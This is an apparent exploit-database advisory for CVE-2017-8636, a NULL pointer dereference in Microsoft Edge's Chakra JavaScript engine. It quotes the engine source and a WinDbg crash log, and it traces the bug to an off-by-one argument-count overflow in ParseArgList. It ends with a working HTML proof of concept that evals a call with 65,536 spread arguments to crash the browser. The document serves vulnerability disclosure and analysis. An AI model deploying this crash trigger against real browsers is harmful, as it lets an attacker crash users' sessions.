Microsoft Edge Chakra - NULL Pointer Dereference



EKU-ID: 6853 CVE: 2017-8636 OSVDB-ID:
Author: Huang Anwen Published: 2017-08-18 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


<!--
Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team
 
The issue could lead a nullptr derefrence besides a stack overflow we metioned previously.
 
// ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp
Js::ArgSlot EmitArgList(
    ParseNode *pnode,
    Js::RegSlot rhsLocation,
    Js::RegSlot thisLocation,
    Js::RegSlot newTargetLocation,
    BOOL fIsEval,
    BOOL fAssignRegs,
    ByteCodeGenerator *byteCodeGenerator,
    FuncInfo *funcInfo,
    Js::ProfileId callSiteId,
    uint16 spreadArgCount = 0,
    Js::AuxArray<uint32> **spreadIndices = nullptr)
{
    // This function emits the arguments for a call.
    // ArgOut's with uses immediately following defs.
 
    EmitArgListStart(thisLocation, byteCodeGenerator, funcInfo, callSiteId);
 
    Js::RegSlot evalLocation = Js::Constants::NoRegister;
 
    //
    // If Emitting arguments for eval and assigning registers, get a tmpLocation for eval.
    // This would be used while generating frameDisplay in EmitArgListEnd.
    //
    if (fIsEval)
    {
        evalLocation = funcInfo->AcquireTmpRegister();
    }
 
    if (spreadArgCount > 0)      //spreadArgCount==0 because of overflow****
    {
        const size_t extraAlloc = spreadArgCount * sizeof(uint32);
        Assert(spreadIndices != nullptr);
        *spreadIndices = AnewPlus(byteCodeGenerator->GetAllocator(), extraAlloc, Js::AuxArray<uint32>, spreadArgCount);        //skip initialization of spreadIndices****
    }
 
    size_t argIndex = EmitArgs(pnode, fAssignRegs, byteCodeGenerator, funcInfo, callSiteId, spreadIndices == nullptr ? nullptr : *spreadIndices);
 
    Js::ArgSlot argumentsCount = EmitArgListEnd(pnode, rhsLocation, thisLocation, evalLocation, newTargetLocation, byteCodeGenerator, funcInfo, argIndex, callSiteId);
 
    if (fIsEval)
    {
        funcInfo->ReleaseTmpRegister(evalLocation);
    }
 
    return argumentsCount;
}
 
 
// ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp
size_t EmitArgs(
    ParseNode *pnode,
    BOOL fAssignRegs,
    ByteCodeGenerator *byteCodeGenerator,
    FuncInfo *funcInfo,
    Js::ProfileId callSiteId,
    Js::AuxArray<uint32> *spreadIndices = nullptr
    )
{
    Js::ArgSlot argIndex = 0;
    Js::ArgSlot spreadIndex = 0;
 
    if (pnode != nullptr)
    {
        while (pnode->nop == knopList)
        {
            // If this is a put, the arguments have already been evaluated (see EmitReference).
            // We just need to emit the ArgOut instructions.
            if (fAssignRegs)
            {
                Emit(pnode->sxBin.pnode1, byteCodeGenerator, funcInfo, false);
            }
 
            if (pnode->sxBin.pnode1->nop == knopEllipsis)
            {
                Assert(spreadIndices != nullptr);
                spreadIndices->elements[spreadIndex++] = argIndex + 1; // account for 'this'         //nullptr derefrence****
                EmitSpreadArgToListBytecodeInstr(byteCodeGenerator, funcInfo, pnode->sxBin.pnode1->location, callSiteId, argIndex);
            }
            else
            {
                byteCodeGenerator->Writer()->ArgOut<true>(++argIndex, pnode->sxBin.pnode1->location, callSiteId);
            }
            if (fAssignRegs)
            {
                funcInfo->ReleaseLoc(pnode->sxBin.pnode1);
            }
 
            pnode = pnode->sxBin.pnode2;
        }
 
        // If this is a put, the call target has already been evaluated (see EmitReference).
        if (fAssignRegs)
        {
            Emit(pnode, byteCodeGenerator, funcInfo, false);
        }
 
        if (pnode->nop == knopEllipsis)
        {
            Assert(spreadIndices != nullptr);
            spreadIndices->elements[spreadIndex++] = argIndex + 1; // account for 'this'
            EmitSpreadArgToListBytecodeInstr(byteCodeGenerator, funcInfo, pnode->location, callSiteId, argIndex);
        }
        else
        {
            byteCodeGenerator->Writer()->ArgOut<true>(++argIndex, pnode->location, callSiteId);
        }
 
        if (fAssignRegs)
        {
            funcInfo->ReleaseLoc(pnode);
        }
    }
 
    return argIndex;
}
 
Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.
 
*** wait with pending attach
Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00007ff6`56460000 00007ff6`56485000   C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
ModLoad: 00007ffd`4cba0000 00007ffd`4cd7b000   C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 00007ffd`4ad90000 00007ffd`4ae3e000   C:\Windows\System32\KERNEL32.DLL
ModLoad: 00007ffd`49c00000 00007ffd`49e49000   C:\Windows\System32\KERNELBASE.dll
ModLoad: 00007ffd`475e0000 00007ffd`4765e000   C:\Windows\SYSTEM32\apphelp.dll
ModLoad: 00007ffd`4a1a0000 00007ffd`4a499000   C:\Windows\System32\combase.dll
ModLoad: 00007ffd`499b0000 00007ffd`49aa6000   C:\Windows\System32\ucrtbase.dll
ModLoad: 00007ffd`4b250000 00007ffd`4b375000   C:\Windows\System32\RPCRT4.dll
ModLoad: 00007ffd`49eb0000 00007ffd`49f1a000   C:\Windows\System32\bcryptPrimitives.dll
ModLoad: 00007ffd`4a100000 00007ffd`4a19d000   C:\Windows\System32\msvcrt.dll
ModLoad: 00007ffd`43c40000 00007ffd`43ca0000   C:\Windows\SYSTEM32\wincorlib.DLL
ModLoad: 00007ffd`4b380000 00007ffd`4b440000   C:\Windows\System32\OLEAUT32.dll
ModLoad: 00007ffd`49b60000 00007ffd`49bfa000   C:\Windows\System32\msvcp_win.dll
ModLoad: 00007ffd`490a0000 00007ffd`490b1000   C:\Windows\System32\kernel.appcore.dll
ModLoad: 00007ffd`2c870000 00007ffd`2cc34000   C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll
ModLoad: 00007ffd`492b0000 00007ffd`499a2000   C:\Windows\System32\Windows.Storage.dll
ModLoad: 00007ffd`4b4f0000 00007ffd`4b591000   C:\Windows\System32\advapi32.dll
ModLoad: 00007ffd`4b1f0000 00007ffd`4b249000   C:\Windows\System32\sechost.dll
ModLoad: 00007ffd`4cb40000 00007ffd`4cb91000   C:\Windows\System32\shlwapi.dll
ModLoad: 00007ffd`4a8e0000 00007ffd`4a907000   C:\Windows\System32\GDI32.dll
ModLoad: 00007ffd`49f20000 00007ffd`4a0a8000   C:\Windows\System32\gdi32full.dll
ModLoad: 00007ffd`4c9f0000 00007ffd`4cb3a000   C:\Windows\System32\USER32.dll
ModLoad: 00007ffd`41cb0000 00007ffd`41f36000   C:\Windows\SYSTEM32\iertutil.dll
ModLoad: 00007ffd`490c0000 00007ffd`490de000   C:\Windows\System32\win32u.dll
ModLoad: 00007ffd`4a9c0000 00007ffd`4aa6a000   C:\Windows\System32\shcore.dll
ModLoad: 00007ffd`49030000 00007ffd`4907c000   C:\Windows\System32\powrprof.dll
ModLoad: 00007ffd`49010000 00007ffd`49025000   C:\Windows\System32\profapi.dll
ModLoad: 00007ffd`48310000 00007ffd`48341000   C:\Windows\SYSTEM32\ntmarta.dll
ModLoad: 00007ffd`48f10000 00007ffd`48f39000   C:\Windows\SYSTEM32\USERENV.dll
ModLoad: 00007ffd`486a0000 00007ffd`48744000   C:\Windows\SYSTEM32\DNSAPI.dll
ModLoad: 00007ffd`4b030000 00007ffd`4b09c000   C:\Windows\System32\WS2_32.dll
ModLoad: 00007ffd`4a9b0000 00007ffd`4a9b8000   C:\Windows\System32\NSI.dll
ModLoad: 00007ffd`38c70000 00007ffd`38c96000   C:\Windows\SYSTEM32\clipc.dll
ModLoad: 00007ffd`48a60000 00007ffd`48a77000   C:\Windows\SYSTEM32\cryptsp.dll
ModLoad: 00007ffd`4b4a0000 00007ffd`4b4cd000   C:\Windows\System32\IMM32.DLL
ModLoad: 00007ffd`48660000 00007ffd`48697000   C:\Windows\SYSTEM32\IPHLPAPI.DLL
ModLoad: 00007ffd`479c0000 00007ffd`47b30000   C:\Windows\SYSTEM32\twinapi.appcore.dll
ModLoad: 00007ffd`48ee0000 00007ffd`48f05000   C:\Windows\SYSTEM32\bcrypt.dll
ModLoad: 00007ffd`48140000 00007ffd`48161000   C:\Windows\SYSTEM32\profext.dll
ModLoad: 00007ffd`38a20000 00007ffd`38a94000   C:\Windows\SYSTEM32\msiso.dll
ModLoad: 00007ffd`3e660000 00007ffd`3e682000   C:\Windows\SYSTEM32\EShims.dll
ModLoad: 00007ffd`3d710000 00007ffd`3d72b000   C:\Windows\SYSTEM32\MPR.dll
ModLoad: 00007ffd`4b0a0000 00007ffd`4b1e5000   C:\Windows\System32\ole32.dll
ModLoad: 00007ffd`47830000 00007ffd`478c5000   C:\Windows\system32\uxtheme.dll
ModLoad: 00007ffd`379c0000 00007ffd`37a61000   C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
ModLoad: 00007ffd`2df90000 00007ffd`2f641000   C:\Windows\SYSTEM32\edgehtml.dll
ModLoad: 00007ffd`2d730000 00007ffd`2df1b000   C:\Windows\SYSTEM32\chakra.dll
ModLoad: 00007ffd`45500000 00007ffd`45639000   C:\Windows\SYSTEM32\wintypes.dll
ModLoad: 00007ffd`3e0a0000 00007ffd`3e0df000   C:\Windows\SYSTEM32\MLANG.dll
ModLoad: 00007ffd`45c20000 00007ffd`45c96000   C:\Windows\SYSTEM32\policymanager.dll
ModLoad: 00007ffd`45b90000 00007ffd`45c1f000   C:\Windows\SYSTEM32\msvcp110_win.dll
ModLoad: 00007ffd`45fb0000 00007ffd`46146000   C:\Windows\SYSTEM32\PROPSYS.dll
ModLoad: 00007ffd`39b50000 00007ffd`39c1b000   C:\Windows\System32\ieproxy.dll
ModLoad: 00007ffd`436b0000 00007ffd`437b6000   C:\Windows\System32\Windows.UI.dll
ModLoad: 00007ffd`435e0000 00007ffd`43662000   C:\Windows\SYSTEM32\TextInputFramework.dll
ModLoad: 00007ffd`46eb0000 00007ffd`46f93000   C:\Windows\SYSTEM32\CoreMessaging.dll
ModLoad: 00007ffd`44b90000 00007ffd`44e62000   C:\Windows\SYSTEM32\CoreUIComponents.dll
ModLoad: 00007ffd`45b70000 00007ffd`45b85000   C:\Windows\SYSTEM32\usermgrcli.dll
ModLoad: 00007ffd`44040000 00007ffd`44571000   C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
ModLoad: 00007ffd`4b5a0000 00007ffd`4c9d7000   C:\Windows\System32\shell32.dll
ModLoad: 00007ffd`4a0b0000 00007ffd`4a0f9000   C:\Windows\System32\cfgmgr32.dll
ModLoad: 00007ffd`46150000 00007ffd`4617a000   C:\Windows\SYSTEM32\dwmapi.dll
ModLoad: 00007ffd`39200000 00007ffd`3952e000   C:\Windows\SYSTEM32\WININET.dll
ModLoad: 00007ffd`4ac20000 00007ffd`4ad86000   C:\Windows\System32\msctf.dll
ModLoad: 00007ffd`48f40000 00007ffd`48f70000   C:\Windows\SYSTEM32\SspiCli.dll
ModLoad: 00007ffd`43860000 00007ffd`43962000   C:\Windows\SYSTEM32\mrmcorer.dll
ModLoad: 00007ffd`36760000 00007ffd`36770000   C:\Windows\SYSTEM32\tokenbinding.dll
ModLoad: 00007ffd`43ba0000 00007ffd`43c09000   C:\Windows\SYSTEM32\Bcp47Langs.dll
ModLoad: 00007ffd`396b0000 00007ffd`396cb000   C:\Windows\SYSTEM32\ondemandconnroutehelper.dll
ModLoad: 00007ffd`400d0000 00007ffd`401a7000   C:\Windows\SYSTEM32\winhttp.dll
ModLoad: 00007ffd`488c0000 00007ffd`4891c000   C:\Windows\system32\mswsock.dll
ModLoad: 00007ffd`42450000 00007ffd`4245b000   C:\Windows\SYSTEM32\WINNSI.DLL
ModLoad: 00007ffd`41940000 00007ffd`41b08000   C:\Windows\SYSTEM32\urlmon.dll
ModLoad: 00007ffd`48a80000 00007ffd`48a8b000   C:\Windows\SYSTEM32\CRYPTBASE.DLL
ModLoad: 00007ffd`36f20000 00007ffd`36f3a000   C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll
ModLoad: 00007ffd`38ae0000 00007ffd`38c6a000   C:\Windows\SYSTEM32\ieapfltr.dll
ModLoad: 00007ffd`47670000 00007ffd`4768d000   C:\Windows\System32\rmclient.dll
ModLoad: 00007ffd`34410000 00007ffd`34457000   C:\Windows\system32\dataexchange.dll
ModLoad: 00007ffd`46fa0000 00007ffd`470c2000   C:\Windows\SYSTEM32\dcomp.dll
ModLoad: 00007ffd`46620000 00007ffd`468ff000   C:\Windows\SYSTEM32\d3d11.dll
ModLoad: 00007ffd`47e80000 00007ffd`47f24000   C:\Windows\SYSTEM32\dxgi.dll
ModLoad: 00007ffd`35bb0000 00007ffd`35bc8000   C:\Windows\System32\UiaManager.dll
ModLoad: 00007ffd`37e60000 00007ffd`37ee2000   C:\Windows\system32\twinapi.dll
ModLoad: 00007ffd`2d700000 00007ffd`2d728000   C:\Windows\SYSTEM32\srpapi.dll
ModLoad: 00007ffd`490e0000 00007ffd`492a9000   C:\Windows\System32\CRYPT32.dll
ModLoad: 00007ffd`49080000 00007ffd`49091000   C:\Windows\System32\MSASN1.dll
ModLoad: 00007ffd`30870000 00007ffd`308ea000   C:\Windows\SYSTEM32\windows.ui.core.textinput.dll
ModLoad: 00007ffd`385b0000 00007ffd`3860d000   C:\Windows\SYSTEM32\ninput.dll
ModLoad: 00007ffd`46900000 00007ffd`46ea4000   C:\Windows\SYSTEM32\d2d1.dll
ModLoad: 00007ffd`40390000 00007ffd`4064f000   C:\Windows\SYSTEM32\DWrite.dll
ModLoad: 00007ffd`30470000 00007ffd`304ca000   C:\Windows\System32\Windows.Graphics.dll
ModLoad: 00007ffd`2d6f0000 00007ffd`2d6ff000   C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll
ModLoad: 00007ffd`448a0000 00007ffd`448e2000   C:\Windows\SYSTEM32\vm3dum64.dll
ModLoad: 00007ffd`44680000 00007ffd`446e7000   C:\Windows\SYSTEM32\D3D10Level9.dll
ModLoad: 00007ffd`37780000 00007ffd`377eb000   C:\Windows\System32\oleacc.dll
ModLoad: 00007ffd`2d6e0000 00007ffd`2d6f0000   C:\Windows\system32\msimtf.dll
ModLoad: 00007ffd`40030000 00007ffd`400b8000   C:\Windows\system32\directmanipulation.dll
ModLoad: 00007ffd`39af0000 00007ffd`39b04000   C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll
ModLoad: 00007ffd`3f270000 00007ffd`3f2a8000   C:\Windows\System32\smartscreenps.dll
ModLoad: 00007ffd`377f0000 00007ffd`379b5000   C:\Windows\System32\uiautomationcore.dll
ModLoad: 00007ffd`40200000 00007ffd`40388000   C:\Windows\SYSTEM32\windows.globalization.dll
(18bc.14e0): Access violation - code c0000005 (!!! second chance !!!)
chakra!EmitArgs+0xddda3:
00007ffd`2da3132f 41894c8504      mov     dword ptr [r13+rax*4+4],ecx ds:00000000`00000004=????????
0:016> r
rax=0000000000000000 rbx=0000006a8f7faeb0 rcx=0000000000000001
rdx=0000019df75e3040 rsi=0000000000000002 rdi=0000006a8f7fa9c0
rip=00007ffd2da3132f rsp=0000006a8f7fb0f0 rbp=0000006a8f7fb8f0
 r8=0000000000000000  r9=0000000000000000 r10=0000000000000009
r11=0000019df75ff04d r12=0000000000000001 r13=0000000000000000
r14=0000006a8f7fb8f0 r15=0000000000000000
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010200
chakra!EmitArgs+0xddda3:
00007ffd`2da3132f 41894c8504      mov     dword ptr [r13+rax*4+4],ecx ds:00000000`00000004=????????
0:016> ub
chakra!EmitArgListEnd+0xdde2c:
00007ffd`2da3130c 0f856022f2ff    jne     chakra!EmitArgListEnd+0x92 (00007ffd`2d953572)
00007ffd`2da31312 0fb7c6          movzx   eax,si
00007ffd`2da31315 e95b22f2ff      jmp     chakra!EmitArgListEnd+0x95 (00007ffd`2d953575)
00007ffd`2da3131a 410fb7c4        movzx   eax,r12w
00007ffd`2da3131e 664403e2        add     r12w,dx
00007ffd`2da31322 0fb7cf          movzx   ecx,di
00007ffd`2da31325 03ca            add     ecx,edx
00007ffd`2da31327 488b942498000000 mov     rdx,qword ptr [rsp+98h]
0:016> u
chakra!EmitArgs+0xddda3:
00007ffd`2da3132f 41894c8504      mov     dword ptr [r13+rax*4+4],ecx
00007ffd`2da31334 488d4c2440      lea     rcx,[rsp+40h]
00007ffd`2da31339 488b4328        mov     rax,qword ptr [rbx+28h]
00007ffd`2da3133d 48894c2420      mov     qword ptr [rsp+20h],rcx
00007ffd`2da31342 488bcd          mov     rcx,rbp
00007ffd`2da31345 448b400c        mov     r8d,dword ptr [rax+0Ch]
00007ffd`2da31349 e8229c2300      call    chakra!EmitSpreadArgToListBytecodeInstr (00007ffd`2dc6af70)
00007ffd`2da3134e 0fb77c2440      movzx   edi,word ptr [rsp+40h]
0:016> kb
RetAddr           : Args to Child                                                           : Call Site
00007ffd`2d953484 : 0000019d`f64e8aa0 00007ffd`00000001 0000006a`8f7fb8f0 0000019d`f75e3040 : chakra!EmitArgs+0xddda3
00007ffd`2d952850 : 0000019d`f64e8aa0 0000019d`ffffffff 0000019d`ffffffff 0000006a`ffffffff : chakra!EmitArgList+0x9c
00007ffd`2d8d3768 : 0000019d`f64e8940 0000006a`8f7fb8f0 0000019d`f75e3040 00000000`00000000 : chakra!EmitNew+0x16c
00007ffd`2d8d2c55 : 0000019d`f64e8940 0000006a`8f7fb8f0 0000019d`f75e3040 00000000`00000000 : chakra!Emit+0x15d8
00007ffd`2d8dd790 : 0000019d`f64e8810 0000006a`8f7fb8f0 0000019d`f75e3040 0000006a`00000001 : chakra!Emit+0xac5
00007ffd`2d8db4b9 : 0000006a`8f7fb8f0 0000019d`f64e8810 0000019d`f75e3040 0000006a`00000001 : chakra!ByteCodeGenerator::EmitTopLevelStatement+0x80
00007ffd`2d8daee5 : 0000006a`8f7fb8f0 0000019d`f75e3040 00000000`00000000 0000019d`f75e3040 : chakra!ByteCodeGenerator::EmitGlobalBody+0x75
00007ffd`2d8da274 : 0000006a`8f7fb8f0 0000019d`f64e8030 0000019d`f75e3030 0000006a`8f7fb8f0 : chakra!ByteCodeGenerator::EmitOneFunction+0xa75
00007ffd`2d9826aa : 0000006a`8f7fb8f0 0000019d`f64e8030 00000000`00000000 0000006a`8f7fb8f0 : chakra!ByteCodeGenerator::EmitScopeList+0x164
00007ffd`2d982541 : 0000019d`f64e8030 0000019d`00003c22 0000006a`8f7fb8f0 0000006a`8f7fbb30 : chakra!ByteCodeGenerator::Generate+0x142
00007ffd`2d7a2820 : 0000019d`f64e8030 0000019d`00003c22 0000019d`f2b2d110 0000006a`8f7fbb30 : chakra!GenerateByteCode+0x8d
00007ffd`2d748201 : 0000019d`f2b2d110 0000019d`f67c0020 0000019d`00050022 0000006a`00000000 : chakra!Js::GlobalObject::DefaultEvalHelper+0x380
00007ffd`2d747fb8 : 0000019d`f6260000 00007ffd`2de79f80 0000019d`00000000 0000019d`f625c000 : chakra!Js::GlobalObject::VEval+0x231
00007ffd`2d747ecd : 0000006a`8f7fc0d0 0000019d`f625b5c0 0000019d`f2b2a150 0000006a`8f7fc090 : chakra!Js::GlobalObject::EntryEvalHelper+0xc8
00007ffd`2d9a6be3 : 0000019d`f625b5c0 00000000`18000003 0000019d`f6270020 0000019d`f628ef00 : chakra!Js::GlobalObject::EntryEval+0x7d
00007ffd`2d896bf3 : 0000019d`f2b2a150 00000000`00000018 0000006a`8f7fc330 00000000`00000006 : chakra!amd64_CallFunction+0x93
00007ffd`2d7571ac : 0000019d`f625b5c0 00007ffd`2d747e50 0000006a`8f7fc1a0 0000006a`8f7fc330 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
00007ffd`2d7577b4 : 0000006a`8f7fc330 0000019d`f64e009a 0000019d`f625b5c0 00007ffd`00000008 : chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > > >+0x114
00007ffd`2d834920 : 0000006a`8f7fc330 0000019d`f64e009a 0000019d`8f7fc330 0000019d`f64e00a8 : chakra!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallIExtendedFlags<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > >+0x5c
00007ffd`2d82ff2c : 0000006a`8f7fc330 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessProfiled+0x1250
00007ffd`2d8c80cc : 0000006a`8f7fc330 0000019d`f64c0000 0000006a`8f7fc4f0 00007ffd`4cc05401 : chakra!Js::InterpreterStackFrame::Process+0x12c
00007ffd`2d8c7be1 : 0000019d`f6280420 0000006a`8f7fc6d0 0000019d`f6500fc2 0000006a`8f7fc6e8 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
0000019d`f6500fc2 : 0000006a`8f7fc720 00000000`00000000 00000000`00000000 00007ffd`2d9a6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51
00007ffd`2d9a6be3 : 0000019d`f6280420 00000000`00000000 00000000`00000000 00000000`00000000 : 0x19d`f6500fc2
00007ffd`2d896bf3 : 0000019d`f2b2a150 00000000`00000000 0000019d`f2b50c00 00007ffd`2d8aa837 : chakra!amd64_CallFunction+0x93
00007ffd`2d8c1810 : 0000019d`f6280420 00007ffd`2d9a6df0 0000006a`8f7fc820 0000019d`f2b2d110 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
00007ffd`2d8c0a37 : 0000019d`f6280420 0000006a`8f7fc910 0000019d`f2b2d110 00007ffd`4a167100 : chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100
00007ffd`2d98907e : 0000019d`f6280420 0000006a`8f7fc970 0000019d`f2b2d110 0000019d`f2b2da00 : chakra!Js::JavascriptFunction::CallRootFunction+0x4b
00007ffd`2d8ecd54 : 0000019d`f6280420 0000006a`8f7fc9b0 00000000`00000000 0000006a`8f7fc9c8 : chakra!ScriptSite::CallRootFunction+0x6a
00007ffd`2d881b49 : 0000019d`f2b2d000 0000019d`f6280420 0000006a`8f7fca60 00000000`00000000 : chakra!ScriptSite::Execute+0x124
00007ffd`2d882e8e : 0000019d`f2b29d00 0000006a`8f7fcf68 0000006a`8f7fcfa0 0000006a`80000082 : chakra!ScriptEngine::ExecutePendingScripts+0x1a5
00007ffd`2d883121 : 0000019d`f2b29d00 0000019d`f370c4c4 00000000`00000000 0000019d`f2cb4330 : chakra!ScriptEngine::ParseScriptTextCore+0x436
00007ffd`2e393c75 : 0000019d`f2b29d50 0000019d`f370c4c4 0000019d`0000008a 00000000`00000000 : chakra!ScriptEngine::ParseScriptText+0xb1
00007ffd`2e393abe : 00000000`00000000 0000006a`8f7fce39 0000019d`f2cb4260 0000019d`00000000 : edgehtml!CJScript9Holder::ParseScriptText+0x119
00007ffd`2e3935d7 : 00000000`00000000 0000019d`f2cb4260 0000019d`f2c3c1c0 0000019d`f2cb41b0 : edgehtml!CScriptCollection::ParseScriptText+0x202
00007ffd`2e392f07 : 0000019d`f2c50c01 0000019d`f2cac100 0000019d`00000082 00007ffd`00000000 : edgehtml!CScriptData::CommitCode+0x357
00007ffd`2e452f8d : 00000000`ffffffff 0000019d`f2c3c460 00000000`ffffffff 00000000`00000000 : edgehtml!CScriptData::Execute+0x20f
00007ffd`2e2943d4 : 00000000`00000000 0000019d`f2c8c440 00000000`00000001 00007ffd`2e44ceb9 : edgehtml!CHtmScriptParseCtx::Execute+0x7d
00007ffd`2e2934a1 : 0000019d`f2c50c00 00000000`00000000 0000019d`f2c50c00 0000019d`f2c2c8c0 : edgehtml!CHtmParseBase::Execute+0x204
00007ffd`2e44d23b : 00000000`00019717 0000019d`f2c20000 0000019d`f2c800b0 0000019d`f2c2c8c0 : edgehtml!CHtmPost::Exec+0x1e1
00007ffd`2e44d11f : 0000019d`f2c2c8c0 00000000`00019717 0000019d`f37e6dc0 00000000`00000000 : edgehtml!CHtmPost::Run+0x2f
00007ffd`2e44cfd3 : 0000019d`f2c20000 00000000`06363701 00000000`00000002 0000019d`f2c61740 : edgehtml!PostManExecute+0x63
00007ffd`2e44ce6d : 0000019d`f2c2c8c0 00000000`06363729 0000019d`00000000 00007ffd`41cd4779 : edgehtml!PostManResume+0xa3
00007ffd`2e45b353 : 0000019d`f2c48600 0000019d`f3734bd0 00000000`00000000 00000000`00000000 : edgehtml!CHtmPost::OnDwnChanCallback+0x3d
00007ffd`2e4350db : 0000019d`f2c282d0 0000019d`f2b25491 0000019d`f2b02200 0000006a`8f7fd4f0 : edgehtml!CDwnChan::OnMethodCall+0x23
00007ffd`2e2c1706 : 0000019d`f2b02728 0000019d`f2c61740 0000019d`f2b02260 0000006a`8f7fd520 : edgehtml!GWndAsyncTask::Run+0x1b
00007ffd`2e40a860 : 00000000`0e877146 0000019d`f2c617a0 0000019d`f2c800b0 00007ffd`2e369138 : edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236
00007ffd`2e40a683 : 0000019d`f3734bd0 00000000`00000000 00000000`00000002 0000019d`f2c28170 : edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70
00007ffd`2e2c22b3 : 0000006a`8f7fd9d0 00000000`00008002 0000019d`f2c28170 00007ffd`4ca147df : edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3
00007ffd`2e2c07a5 : 00000000`00008002 0000019d`f2c20000 000042e1`6a33249e 00007ffd`2e33721d : edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53
00007ffd`4c9fbc50 : 00000000`00010442 00000000`00000001 00000000`00000002 00000000`80000012 : edgehtml!GlobalWndProc+0x125
00007ffd`4c9fb5cf : 00000195`f12868c0 00007ffd`2e2c0680 00000000`00010442 00000000`00010442 : USER32!UserCallWinProcCheckWow+0x280
00007ffd`2c876d0e : 0000006a`8f7fd970 00000000`00000000 00000195`f0cd3840 00000000`00000000 : USER32!DispatchMessageWorker+0x19f
00007ffd`2c88eecb : 00000000`00000000 00000000`00000001 00000195`f0f29cd0 00000195`f0cc3960 : EdgeContent!CBrowserTab::_TabWindowThreadProc+0x3ee
00007ffd`38a2b4a8 : 00000000`00000000 00000195`f0f28990 00000000`00000000 00000000`00000000 : EdgeContent!LCIETab_ThreadProc+0x2ab
00007ffd`4ada2774 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msiso!_IsoThreadProc_WrapperToReleaseScope+0x48
00007ffd`4cc10d61 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
 
 
The root cause of the nullptr derefrencing is an overflow in Parser::ParseArgList
//ChakraCore-master\lib\Parser\Parse.cpp
/***************************************************************************
Parse a list of arguments.
***************************************************************************/
template<bool buildAST>
ParseNodePtr Parser::ParseArgList( bool *pCallOfConstants, uint16 *pSpreadArgCount, uint16 * pCount)
{
    ParseNodePtr pnodeArg;
    ParseNodePtr pnodeList = nullptr;
    ParseNodePtr *lastNodeRef = nullptr;
 
    // Check for an empty list
    Assert(m_token.tk == tkLParen);
 
    if (m_pscan->Scan() == tkRParen)
    {
        return nullptr;
    }
 
    *pCallOfConstants = true;
    *pSpreadArgCount = 0;
 
    int count=0;
    while (true)
    {
        // the count of arguments has to fit in an unsigned short
        if (count > 0xffffU)                    //SHOULD BE if (count >= oxffffU)
            Error(ERRnoMemory);
        // Allow spread in argument lists.
        IdentToken token;
        pnodeArg = ParseExpr<buildAST>(koplCma, nullptr, TRUE, /* fAllowEllipsis */TRUE, NULL, nullptr, nullptr, &token);
        ++count;                                //when count==0xffffU, an overflow occurs HERE!!!
        this->MarkEscapingRef(pnodeArg, &token);
 
        if (buildAST)
        {
            this->CheckArguments(pnodeArg);
 
            if (*pCallOfConstants && !IsConstantInFunctionCall(pnodeArg))
            {
                *pCallOfConstants = false;
            }
 
            if (pnodeArg->nop == knopEllipsis)
            {
                (*pSpreadArgCount)++;
            }
 
            AddToNodeListEscapedUse(&pnodeList, &lastNodeRef, pnodeArg);
        }
        if (m_token.tk != tkComma)
        {
            break;
        }
        m_pscan->Scan();
 
        if (m_token.tk == tkRParen && m_scriptContext->GetConfig()->IsES7TrailingCommaEnabled())
        {
            break;
        }
    }
 
    if (pSpreadArgCount!=nullptr && (*pSpreadArgCount) > 0){
        CHAKRATEL_LANGSTATS_INC_LANGFEATURECOUNT(SpreadFeature, m_scriptContext);
    }
 
    *pCount = static_cast<uint16>(count);
    if (buildAST)
    {
        AssertMem(lastNodeRef);
        AssertNodeMem(*lastNodeRef);
        pnodeList->ichLim = (*lastNodeRef)->ichLim;
    }
 
    return pnodeList;
}
-->
<html>
<head>
<title> POC </title>
</head>
<script>
 
var a=[];
a.length=0xFFFF+1;
a.fill('...a');
var b="function Car(){}; var car=new Car("+a.join()+");";
//alert(b);
eval(b);
 
</script>
</html>